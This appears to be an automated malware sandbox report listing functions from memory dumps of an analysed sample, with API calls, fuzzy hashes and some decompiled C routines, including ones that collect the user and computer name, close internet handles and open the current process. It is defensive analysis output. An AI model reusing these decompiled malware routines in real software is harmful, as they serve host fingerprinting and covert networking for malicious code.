Function 001E2960, Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001E298D
std::_Lockit::_Lockit.LIBCPMT ref: 001E29AD
std::_Lockit::~_Lockit.LIBCPMT ref: 001E29CD
std::_Facet_Register.LIBCPMT ref: 001E2A6B
std::_Lockit::~_Lockit.LIBCPMT ref: 001E2A83

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dc6e968e636437032109d98ef20c262ccb04f29902493e6ab13cd64f80b0d399
Instruction ID: 956a7e3f0a5f3dd978befc369b3d592a3b1fe92a4d3755c40f9f837acf851980
Opcode Fuzzy Hash: dc6e968e636437032109d98ef20c262ccb04f29902493e6ab13cd64f80b0d399
Instruction Fuzzy Hash: F641EE71A00694CFCB25DF44D890BAEB7F9EF44710F14416AE806AF292DB70BD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9267, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE9267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02CE1525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02CE8B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2ce9cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02ce9275
0x02ce9278
0x02ce927b
0x02ce9281
0x02ce9286
0x02ce928c
0x02ce9294
0x02ce9297
0x02ce929d
0x02ce92a2
0x02ce92af
0x02ce92bc
0x02ce92c0
0x02ce92c2
0x02ce92c6
0x02ce92c9
0x02ce92d9
0x02ce932c
0x02ce932d
0x02ce92db
0x02ce92e0
0x02ce92e1
0x02ce92e6
0x02ce92e9
0x02ce92fc
0x00000000
0x02ce92fe
0x02ce9301
0x02ce9306
0x02ce9314
0x02ce9317
0x02ce931d
0x02ce9322
0x00000000
0x02ce9324
0x02ce9324
0x02ce9327
0x02ce9327
0x02ce9322
0x02ce92fc
0x02ce9332
0x02ce9333
0x02ce92a2
0x02ce9339

APIs

GetUserNameW.ADVAPI32(00000000,02CE9CB0), ref: 02CE927B
GetComputerNameW.KERNEL32(00000000,02CE9CB0), ref: 02CE9297

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

GetUserNameW.ADVAPI32(00000000,02CE9CB0), ref: 02CE92D1
GetComputerNameW.KERNEL32(02CE9CB0,?), ref: 02CE92F4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02CE9CB0,00000000,02CE9CB2,00000000,00000000,?,?,02CE9CB0), ref: 02CE9317

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: e3c12bda4c0c20d0a30ff9ebd2e4f6a2a8d2668fd05b9002dfc4d1e778554500
Instruction ID: 2483b5feed70b40880fe6258f867e67425b6325b76e0dcd8b43630ba6a05cc48
Opcode Fuzzy Hash: e3c12bda4c0c20d0a30ff9ebd2e4f6a2a8d2668fd05b9002dfc4d1e778554500
Instruction Fuzzy Hash: 9821D4B6900208FFCF11DFE9D984DEEBBB8EF44204B5445AAE506E7240D7309B55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02CE58DB, Relevance: 7.6, APIs: 5, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E02CE58DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02CE29C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_t38 =  *0x2ced130; // 0x2ceac81
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					 *_t38( *(_t45 + 0x18));
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					 *_t38( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					 *_t38( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02CE8B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02CE8B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02CE8B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02CE8B22(_t46);
				}
				return _t24;
			}

0x02ce58db
0x02ce58db
0x02ce58dd
0x02ce58df
0x02ce58e6
0x02ce58ed
0x02ce58ed
0x02ce58f2
0x02ce58f5
0x02ce58f6
0x02ce58fc
0x02ce5905
0x02ce5909
0x02ce590e
0x02ce590e
0x02ce5910
0x02ce5915
0x02ce5919
0x02ce591e
0x02ce591e
0x02ce5920
0x02ce5925
0x02ce5929
0x02ce592e
0x02ce592e
0x02ce5930
0x02ce593b
0x02ce593e
0x02ce593e
0x02ce5940
0x02ce5945
0x02ce5948
0x02ce5948
0x02ce594a
0x02ce5951
0x02ce5954
0x02ce5959
0x02ce595c
0x02ce595c
0x02ce595f
0x02ce5964
0x02ce5967
0x02ce5967
0x02ce596c
0x02ce5970
0x02ce5973
0x02ce5973
0x02ce5978
0x02ce597d
0x00000000
0x02ce5980
0x02ce5987

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 02CE5909
InternetSetStatusCallback.WININET(?,00000000), ref: 02CE5919
InternetSetStatusCallback.WININET(?,00000000), ref: 02CE5929
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02CE93DC,?,?,00000000,00000000,76D681D0), ref: 02CE593E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02CE93DC,?,?,00000000,00000000,76D681D0), ref: 02CE5948

Part of subcall function 02CE29C0: WaitForMultipleObjects.KERNEL32(00000002,02CEA923,00000000,02CEA923,?,?,?,02CEA923,0000EA60), ref: 02CE29DB

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackInternetStatus$CloseHandle$MultipleObjectsWait
String ID:
API String ID: 3686715076-0
Opcode ID: ab9ddb0216c3b9d1f416b7545774129053960329df67924af733bba9fdf37b1d
Instruction ID: d1c3a41f617ac79af822f896cab86a274847d8d4562082489515240c6bea4537
Opcode Fuzzy Hash: ab9ddb0216c3b9d1f416b7545774129053960329df67924af733bba9fdf37b1d
Instruction Fuzzy Hash: EE111F766007489BCA30AFAAEC84C5BF7EEFF942683950E19E087D7510C731F945CA60

Uniqueness

Uniqueness Score: -1.00%

Function 0036CE0C, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0036CE24

Part of subcall function 00365F88: HeapFree.KERNEL32(00000000,00000000,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?), ref: 00365F9E
Part of subcall function 00365F88: GetLastError.KERNEL32(?,?,0036D0AD,?,00000000,?,?,?,0036D350,?,00000007,?,?,0036D946,?,?), ref: 00365FB0

_free.LIBCMT ref: 0036CE36
_free.LIBCMT ref: 0036CE48
_free.LIBCMT ref: 0036CE5A
_free.LIBCMT ref: 0036CE6C

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8ece092954996b7fea49486e7c8e5fd77aaedfd089077680dc4aaa0d541e3f42
Instruction ID: fa346a47df3ce301168b70b60e048e41e15756f70016ef36f2cc12d30152a479
Opcode Fuzzy Hash: 8ece092954996b7fea49486e7c8e5fd77aaedfd089077680dc4aaa0d541e3f42
Instruction Fuzzy Hash: E4F06232515604EBCA22EB58F885C2773FDBA107127959D1AF088DF549CB31FC808668

Uniqueness

Uniqueness Score: -1.00%

Function 6DA94D56, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6DA94D6E

Part of subcall function 6DA85D5B: RtlFreeHeap.NTDLL(00000000,00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D71
Part of subcall function 6DA85D5B: GetLastError.KERNEL32(00000000,?,6DA76800,?,00000000,?,6DA68B9E,00000000,00000011,00000001), ref: 6DA85D83

_free.LIBCMT ref: 6DA94D80
_free.LIBCMT ref: 6DA94D92
_free.LIBCMT ref: 6DA94DA4
_free.LIBCMT ref: 6DA94DB6

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8e02de3dd55b1ce50072f465fdc67eecab977510ca3cfa8f86a1adc046dde207
Instruction ID: 2e68cceefb29e290a3f4fc603503ea42d28e662f0046ace9cf3a6fcdcb32c1f1
Opcode Fuzzy Hash: 8e02de3dd55b1ce50072f465fdc67eecab977510ca3cfa8f86a1adc046dde207
Instruction Fuzzy Hash: 41F04F3791D6589BEB10DE54E584C3A33FDAB49A18755090DFC2EDB500C770F8C18698

Uniqueness

Uniqueness Score: -1.00%

Function 001BD930, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadinjectionCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001BD94F
CloseHandle.KERNEL32(?), ref: 001BD958
TerminateThread.KERNEL32(?,00000000), ref: 001BD973
QueueUserAPC.KERNEL32(001BD860,?,00000000), ref: 001BD983
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001BD98E

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Wait$CloseHandleMultipleObjectObjectsQueueSingleTerminateThreadUser
String ID:
API String ID: 3892215915-0
Opcode ID: c1a08b64c08fe3a535858793c0919995a95bf785b0a883283ed2c62d3812a4b9
Instruction ID: a5468e3ff9b495249537076d83cb98f78bd6fcc03a983beaced326d9c69ad8db
Opcode Fuzzy Hash: c1a08b64c08fe3a535858793c0919995a95bf785b0a883283ed2c62d3812a4b9
Instruction Fuzzy Hash: C1F04931540205EBC7119BA8FD05B96F7ECEB08721F10435AF569D26E0DB72A8108B91

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9EBB, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE9EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2ced26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2ced25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2ced258 = _t6;
					 *0x2ced264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2ced254 = _t7;
					if(_t7 == 0) {
						 *0x2ced254 =  *0x2ced254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02ce9ec3
0x02ce9ec9
0x02ce9ed0
0x00000000
0x02ce9f2a
0x02ce9ed2
0x02ce9eda
0x02ce9ee7
0x02ce9ee7
0x02ce9f27
0x00000000
0x02ce9f27
0x02ce9ee9
0x02ce9ee9
0x02ce9eee
0x02ce9f00
0x02ce9f05
0x02ce9f0b
0x02ce9f11
0x02ce9f18
0x02ce9f1a
0x02ce9f1a
0x00000000
0x02ce9f21
0x02ce9ee3
0x00000000
0x00000000
0x02ce9ee5
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02CE27C3,?,?,00000001,?,?,?,02CE7F25,?), ref: 02CE9EC3
GetVersion.KERNEL32(?,00000001,?,?,?,02CE7F25,?), ref: 02CE9ED2
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02CE7F25,?), ref: 02CE9EEE
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02CE7F25,?), ref: 02CE9F0B
GetLastError.KERNEL32(?,00000001,?,?,?,02CE7F25,?), ref: 02CE9F2A

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 38a3b78aeb5f35a19aa0b4ca01ab03eac69c2ea85ac19a402aa845f02624abcd
Instruction ID: 7bc1e0c8d94233b8e901cdc4fbb1204a857f4fd56980d2c890a4384b98842d0b
Opcode Fuzzy Hash: 38a3b78aeb5f35a19aa0b4ca01ab03eac69c2ea85ac19a402aa845f02624abcd
Instruction Fuzzy Hash: 98F08CB0ED0342DBDF208B24A919B153BA4A780701F000A1AE653CE1C0E776C621CB17

Uniqueness

Uniqueness Score: -1.00%

Function 001DFCE0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 001DFEBA
RtlEnterCriticalSection.NTDLL(?), ref: 001E0007
RtlLeaveCriticalSection.NTDLL(?), ref: 001E002B

Strings

D, xrefs: 001DFD95

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$Concurrency::cancel_current_taskEnterLeave
String ID: D
API String ID: 4224942163-2746444292
Opcode ID: a4f17981dc278cb7bb10d0fba496afd75f6b056772bf987c53b642dabba1ca73
Instruction ID: 94a2b20021bf876c54d8266e5b70fb5cb6c474af9f4f41abd6e160b794e64703
Opcode Fuzzy Hash: a4f17981dc278cb7bb10d0fba496afd75f6b056772bf987c53b642dabba1ca73
Instruction Fuzzy Hash: 58D165B0900609DFDB10DFA8C849B9EBBF4FF44314F14865EE869AB391D7B5A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BFD90, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(004D8488), ref: 001BFDC4
RtlLeaveCriticalSection.NTDLL(004D8488), ref: 001BFE21
CloseHandle.KERNEL32(?), ref: 001BFE47

Part of subcall function 001BF0F0: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 001BF10E
Part of subcall function 001BF0F0: WSAGetLastError.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 001BF116

Strings

PkH, xrefs: 001BFE11, 001BFF31

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSection$CloseEnterErrorHandleLastLeaveSend
String ID: PkH
API String ID: 1701131764-1844677740
Opcode ID: 7908be3d2269c15bc7859bedff515b76a36362745c7a5fea5d997fe91b904566
Instruction ID: 2d7ffbd6e6c51074c0d07f6a93fece318bc6b9b216f6186508b97e97705b0e2c
Opcode Fuzzy Hash: 7908be3d2269c15bc7859bedff515b76a36362745c7a5fea5d997fe91b904566
Instruction Fuzzy Hash: D0519A71E01209DFDB15DF98D884BEEBBB4AF48300F1581AEE805AB352D775A905CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001DECC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001DED02
___std_exception_copy.LIBVCRUNTIME ref: 001DED72
___std_exception_destroy.LIBVCRUNTIME ref: 001DEE4C

Strings

pmH, xrefs: 001DED0A

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ___std_exception_copy$___std_exception_destroy
String ID: pmH
API String ID: 4019986568-65301770
Opcode ID: 29e7a7fdcb90b76a2bfbb300bcf8b749849f81cca504a4634c5d6c1667784d78
Instruction ID: c1ace9ed90c3713051882afdc5b6a11e5a4aafdb3735452b9593a6fa592b4d82
Opcode Fuzzy Hash: 29e7a7fdcb90b76a2bfbb300bcf8b749849f81cca504a4634c5d6c1667784d78
Instruction Fuzzy Hash: 80518FB59002198FCB15DF54C984BAEBBF8FF48315F19855AE815AB341E734E904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C0BB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00000000), ref: 001C0BF6
ioctlsocket.WS2_32 ref: 001C0C4A
closesocket.WS2_32(?), ref: 001C0C55

Part of subcall function 001C0200: RtlEnterCriticalSection.NTDLL(?), ref: 001C0234
Part of subcall function 001C0200: RtlLeaveCriticalSection.NTDLL(?), ref: 001C037F

Strings

PkH, xrefs: 001C0C80

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CriticalSectionclosesocket$EnterLeaveioctlsocket
String ID: PkH
API String ID: 485849096-1844677740
Opcode ID: 481c0cb111003a9f157ae76d88417fb73cc49fe24db5f0c31aaed5bb643012bd
Instruction ID: 4ef5314ac773de567e7fb3adccc0c49e385424131de23b26f56761750abcc99d
Opcode Fuzzy Hash: 481c0cb111003a9f157ae76d88417fb73cc49fe24db5f0c31aaed5bb643012bd
Instruction Fuzzy Hash: 4631B070501642CBC722DF28C888B1AB7E4EF69334F148B9DE8649B290E734DE54CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 001D1560, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000001,00000001,00000001,004D8488), ref: 001D15B2
GetLastError.KERNEL32 ref: 001D15BC

Strings

pqcs, xrefs: 001D161B
PkH, xrefs: 001D15C7

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: PkH$pqcs
API String ID: 1506555858-3610218348
Opcode ID: 8e31767a28b0ac5ce70bbe01f754775ab954c315998408a72132dba10e283cae
Instruction ID: 252b273088a455630bc322fba7eddf666e21e295f4ff373ebb8f225ea533db35
Opcode Fuzzy Hash: 8e31767a28b0ac5ce70bbe01f754775ab954c315998408a72132dba10e283cae
Instruction Fuzzy Hash: C721DD30A00605AFCB25DF19C800B6ABBF8FF85B24F14816EE402977A0EB35ED05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001BF0F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 001BF10E
WSAGetLastError.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 001BF116

Strings

M', xrefs: 001BF14F
PkH, xrefs: 001BF131, 001BF163

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLastSend
String ID: M'$PkH
API String ID: 3410151345-3423020562
Opcode ID: 0da124347bec75e54d78bd6df26a733516fd9a48862ada9dcc5e364f87e9e86e
Instruction ID: ac319e0cdba668a85b8d1ac44c4f4eee9eb5d09cc26a1d5d4278f1c120fcc0a2
Opcode Fuzzy Hash: 0da124347bec75e54d78bd6df26a733516fd9a48862ada9dcc5e364f87e9e86e
Instruction Fuzzy Hash: 78217F71900309DBDB20DF68DC447AEFBF4EF95320F208A5EE8A9E7651D771A9458B80

Uniqueness

Uniqueness Score: -1.00%

Function 001BEB60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(00000001,00000001,00000001,00000001), ref: 001BEB89
GetLastError.KERNEL32 ref: 001BEB93

Strings

pqcs, xrefs: 001BEBB2
PkH, xrefs: 001BEB9E

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: PkH$pqcs
API String ID: 1506555858-3610218348
Opcode ID: d5ba5dd30e1cd7cc8f07dc37dc7b6debd4bbf895e13085ceef6467e2518da6bc
Instruction ID: b0b1ee895ac0e4c4428f38a70ca31755e2ef2ef10df60383757f7d5cf6101db2
Opcode Fuzzy Hash: d5ba5dd30e1cd7cc8f07dc37dc7b6debd4bbf895e13085ceef6467e2518da6bc
Instruction Fuzzy Hash: 1921D5B1A006099FDB25DF58D801BEAB7FCEB45714F1082AEE815D7680EB75AD048B90

Uniqueness

Uniqueness Score: -1.00%

Function 001BDC50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(004D8488,00000001,00000001,00000001,004D8488), ref: 001BDCA1
GetLastError.KERNEL32 ref: 001BDCAB

Strings

pqcs, xrefs: 001BDCD5
PkH, xrefs: 001BDCB6

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CompletionErrorLastPostQueuedStatus
String ID: PkH$pqcs
API String ID: 1506555858-3610218348
Opcode ID: 9b404dfda43d418706f6a362c3df03e50bacda4dc1f5f8a8760a1892831ad1b2
Instruction ID: f5ce4c05b402ea9fd5df3452a5d5d7591e025598e9f795f90e4a5336ba39d9b3
Opcode Fuzzy Hash: 9b404dfda43d418706f6a362c3df03e50bacda4dc1f5f8a8760a1892831ad1b2
Instruction Fuzzy Hash: E5115A31A0061A9BCB1ADF25E800BABBFA8FB05724F40026EE91597690FB759944CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001BA2E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(004D8488), ref: 001BA30D
GetLastError.KERNEL32 ref: 001BA31A

Strings

tss, xrefs: 001BA357
PkH, xrefs: 001BA325

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: AllocErrorLast
String ID: PkH$tss
API String ID: 4252645092-96413838
Opcode ID: 2b99290680826082db002d60ffd4864cc16c972b57c28e64d322a5a4413f8e2f
Instruction ID: 74b0fb2e4767828f563da7d4ede83e46aa820a0bcb45373f9664d98bbae40377
Opcode Fuzzy Hash: 2b99290680826082db002d60ffd4864cc16c972b57c28e64d322a5a4413f8e2f
Instruction Fuzzy Hash: B201F5719046499FCB01FFA5AC427DEBBE8EB04710F50062AF824A27C0E77465048686

Uniqueness

Uniqueness Score: -1.00%

Function 001D2900, Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001D29A1
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001D2A00
SetEvent.KERNEL32(00000000), ref: 001D2B52
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001D2B7F

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: e515eeffeb6a299557706027a77384ac59d406bc03c02671aa21c95a768ec5f2
Instruction ID: 42622a81184dee7092c80bc7ce7c87256e55a6953c487c8ab5b397212db9ccd1
Opcode Fuzzy Hash: e515eeffeb6a299557706027a77384ac59d406bc03c02671aa21c95a768ec5f2
Instruction Fuzzy Hash: E98133309046889FDB25DF68C815BAEBBB4FF25314F14011EE859AB381DF74AD85C780

Uniqueness

Uniqueness Score: -1.00%

Function 001D30C0, Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000000), ref: 001D3161
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001D31C0
SetEvent.KERNEL32(00000000,?,00000000), ref: 001D32EF
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMT ref: 001D331D

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorEvent
String ID:
API String ID: 3096193188-0
Opcode ID: eabdbce7a414019df98a8c060d81fcd025e0106334d900ba57cd4875a2eb861c
Instruction ID: 9c167a5d2d9b7e7e3b8dcabb1e14cbdf9e3e162862dcdbf1a33dd32e80a1020b
Opcode Fuzzy Hash: eabdbce7a414019df98a8c060d81fcd025e0106334d900ba57cd4875a2eb861c
Instruction Fuzzy Hash: 0E71F130904249DFDB25DFA8C845BAEBBB4FF25314F24015EE46997381CB74AE85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001C50D0, Relevance: 6.2, APIs: 4, Instructions: 164COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?), ref: 001C5145
GetCurrentProcess.KERNEL32 ref: 001C51BB
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002), ref: 001C51D5
SetEvent.KERNEL32(00000000,00000000), ref: 001C5259

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

